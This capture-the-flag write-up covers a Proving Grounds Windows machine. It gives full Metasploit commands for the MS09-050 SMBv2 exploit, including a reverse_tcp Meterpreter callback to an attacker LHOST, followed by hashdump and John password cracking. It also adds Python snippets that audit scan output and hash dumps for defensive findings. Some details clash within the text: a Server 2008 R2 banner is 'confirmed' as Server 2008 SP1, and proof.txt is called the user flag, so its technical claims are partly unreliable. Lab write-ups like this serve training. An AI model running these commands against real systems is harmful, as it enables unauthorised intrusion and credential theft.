Internal – OSCP Proving Grounds
This write-up covers my approach to Internal, a Windows-based Proving Grounds machine. The objectives: gain initial access, escalate privileges, and capture the proof.txt flag. Below is a step-by-step
VulnSrv | Windows
Difficulty: Easy–Medium
Tags: SMB, RCE, metasploit, hashdump, password cracking
Tools Used: Nmap, smbmap, Metasploit, John the Ripper
This one’s straight out of the OSCP classics playbook—an aging Windows Server leaking vulnerabilities from 2009, wide open SMB ports, and a textbook Meterpreter drop through MS09-050. We'll walk through identifying this RCE vector, exploiting it with Metasploit, and cracking dumped hashes with John for some post-ex creds. Tight, fast, and brutal.
Initial Enumeration
We always start wide. A targeted scan is fine once you've mapped your perimeter, but for OSCP-style machines, go full TCP and script-assisted first.
nmap -sC -sV --open <target_IP>
Here’s what came back:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open httpapi Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc
49153/tcp open msrpc
49154/tcp open msrpc
49155/tcp open msrpc
49156/tcp open msrpc
49157/tcp open msrpc
49158/tcp open msrpc
Seeing 139 and 445 open on an older Windows box (confirmed: Server 2008 SP1) immediately rang alarm bells. These versions are notoriously vulnerable to SMBv2-based remote code execution—especially when no domain hardening or patch hygiene is in place.
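The triage above (legacy Windows banner plus SMB and RDP reachable) is exactly the kind of check worth automating over scan output. The following Python is an added example, not part of the original write-up or any tool it uses: it parses the nmap service table into records and emits defensive findings when SMB is exposed on an end-of-life Windows build. The EOL product list and the sample table (a constructed copy of the scan above) are my own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed copy of the nmap service table from the scan above (sample input).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open httpapi Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc
49153/tcp open msrpc
"""

# One nmap port line: "445/tcp open microsoft-ds <version banner, optional>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Windows product strings that are past end of support (illustrative list, assumed,
# not exhaustive); SMB reachable on any of these is a high-severity finding.
EOL_WINDOWS = (
    "Windows Server 2003",
    "Windows Server 2008",
    "Windows Vista",
    "Windows XP",
    "Windows 7",
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_table(text: str) -> list[Service]:
    """Turn the human-readable nmap port table into Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue  # header, blank and non-port lines are skipped
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version or ""))
    return services


def assess_smb_exposure(services: list[Service]) -> list[str]:
    """Return defensive findings for an exposed, end-of-life SMB stack."""
    findings = []
    open_ports = {s.port for s in services if s.state == "open"}
    banners = " ".join(s.version for s in services)

    smb_open = {139, 445} & open_ports
    if smb_open:
        findings.append(f"SMB reachable on {sorted(smb_open)}")

    eol = [p for p in EOL_WINDOWS if p in banners]
    if eol:
        findings.append(f"End-of-life OS advertised in banner: {eol[0]}")

    if smb_open and eol:
        findings.append(
            "HIGH: SMB exposed on an EOL Windows build; verify MS09-050/SMBv2 patch "
            "state and block 139/445 at the perimeter"
        )
    if 3389 in open_ports:
        findings.append("RDP exposed on 3389; any recovered credential becomes interactive access")
    return findings


if __name__ == "__main__":
    for f in assess_smb_exposure(parse_nmap_table(NMAP_OUTPUT)):
        print(f)
```

Feed it the output of `nmap -sV` for a whole subnet and the "HIGH" line is the list of hosts to patch or firewall first; the banner match is deliberately loose because nmap's OS strings vary between service probes.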
SMB Enumeration
SMB was the clear priority. We tested for share enumeration:
smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>
No dice. No anonymous shares, no accessible drives. Not uncommon—admins sometimes remember to lock the front door. But this box left the windows open. So I pushed forward with a vuln check.
nmap --script smb-vuln* -p 445 <target_IP>
Jackpot:
VULNERABLE:
MS09-050: SMBv2 Remote Code Execution
State: VULNERABLE
...
This is CVE-2009-3103 — a classic buffer overflow in SMBv2 that affects Windows Vista and Server 2008 when handling malformed SMB negotiation requests. No authentication required. It’s a remote shell with zero friction. In 2009, it wrecked networks. In 2025, it still shows up in CTF labs and unpatched legacy systems. That tells you everything about security debt.
User Flag
Time to weaponize.
I fired up Metasploit, locked in the exploit, and set my parameters:
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_VPN_IP>
run
First attempt? Dead air.
Rookie mistake—I had LHOST set to my local 192 IP, not the VPN tunnel (tun0). Always check your interface:
ip a | grep tun0
Corrected that:
set LHOST <tun0_IP>
Second attempt? Boom.
[*] Meterpreter session 1 opened.
And just like that, we're in.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Full SYSTEM access on connect. No need to escalate. The bug lives in the kernel-mode SMB server, so the payload runs as SYSTEM from the first packet.
Flag was right where you'd expect:
meterpreter > search -f proof.txt
Found: C:\Users\Administrator\Desktop\proof.txt
meterpreter > cat C:\Users\Administrator\Desktop\proof.txt
User flag captured.
Post-Exploitation: Hashdump and Cracking
We didn’t need to escalate, but the engagement doesn’t end at SYSTEM. Post-ex is where you squeeze out real value—lateral movement, persistence, credentials, and tokens.
meterpreter > hashdump
Returned:
aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966
Saved to hashes.txt and passed to John:
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Recovered:
aaron: blue
jack: aaa
niky: niky
These passwords are comically weak. Rockyou.txt gets a lot of hate for being overused, but this is why it’s still the go-to for OSCP and real-world low-hanging fruit. Passwords like “blue” and “aaa” have a nasty habit of showing up in SMB, RDP, and even MySQL logins on multi-tier environments.
In a real pentest, you'd dump creds like these into CrackMapExec or use them for lateral RDP pivoting. Here, it’s a strong post-ex proof that credential harvesting still pays off.
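Before any cracking, a dump like the one above already tells a defender a lot: blank passwords, LM hashes still being stored, and the same NT hash on several accounts (password reuse) are all visible without recovering a single plaintext. The Python below is an added example of that audit, not code from the write-up or from Metasploit/John. It accepts both the short user:rid:nt form shown above and the full pwdump form (user:rid:lm:nt:::). The sample dump is constructed; its hashes are placeholders except the two well-known empty-password constants.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Constructed sample in pwdump format (user:rid:lm:nt:::). Hashes are placeholders
# apart from the two constants above; the account names are invented.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:0011223344556677889900aabbccddee:fedcba9876543210fedcba9876543210:::
tim:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_hashdump(text):
    """Parse pwdump lines (user:rid:lm:nt:::) or the short user:rid:nt form.

    Returns a list of dicts; 'lm' is None when the dump carries no LM field.
    """
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) >= 4 and len(fields[3]) == 32:
            user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        elif len(fields) == 3 and len(fields[2]) == 32:
            user, rid, lm, nt = fields[0], int(fields[1]), None, fields[2].lower()
        else:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        accounts.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return accounts


def audit_hashdump(accounts):
    """Credential-hygiene findings that need no cracking at all."""
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings.append(f"{a['user']}: empty password (NT hash of '')")
        if a["lm"] is not None and a["lm"] != EMPTY_LM:
            findings.append(f"{a['user']}: LM hash stored; enforce NoLMHash and rotate the password")
        if a["rid"] == 500:
            findings.append(f"{a['user']}: built-in Administrator (RID 500) present; confirm it is disabled or renamed per policy")
        by_nt[a["nt"]].append(a["user"])
    # Identical NT hashes mean identical passwords: one crack opens every account.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append(f"password reuse: {', '.join(users)} share NT hash {nt[:8]}...")
    return findings


if __name__ == "__main__":
    for f in audit_hashdump(parse_hashdump(SAMPLE_DUMP)):
        print(f)
```

The reuse check is the one that matters most in a domain: a service account sharing its hash with a privileged account is lateral movement waiting to happen, and no wordlist is needed to see it.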
Summary / Review
This box was OSCP comfort food: familiar ports, a juicy vuln, and an immediate payoff.
We started with full TCP recon, homed in on the SMB stack, and spotted MS09-050 like a red flare in the night. Exploiting it with Metasploit was simple once LHOST was set right. The SYSTEM shell was instant. No escalation required.
Post-ex filled in the rest: hashdump and crack, with real creds in hand.
Takeaways:
Set your LHOST to the correct interface. Every time.
Never underestimate SMB—especially on legacy systems.
Post-ex matters. Creds recovered now = shells later.
This is the kind of box that builds confidence, reminds you why enumeration matters, and keeps your reflexes sharp.
Command Recap
nmap -sC -sV --open <target_IP>
smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>
nmap --script smb-vuln* -p 445 <target_IP>
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <tun0 IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
run
getuid
search -f proof.txt
cat C:\Users\Administrator\Desktop\proof.txt
hashdump
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Final Thoughts
Old CVEs never die—they just get rediscovered by new attackers. If you see a Windows Server 2008 box with SMB exposed, assume it’s bleeding until proven otherwise. And if they left MS09-050 unpatched, odds are they’ve got more skeletons buried nearby.
Cracked creds. Remote SYSTEM. No privesc needed.
Another one rooted. On to the next.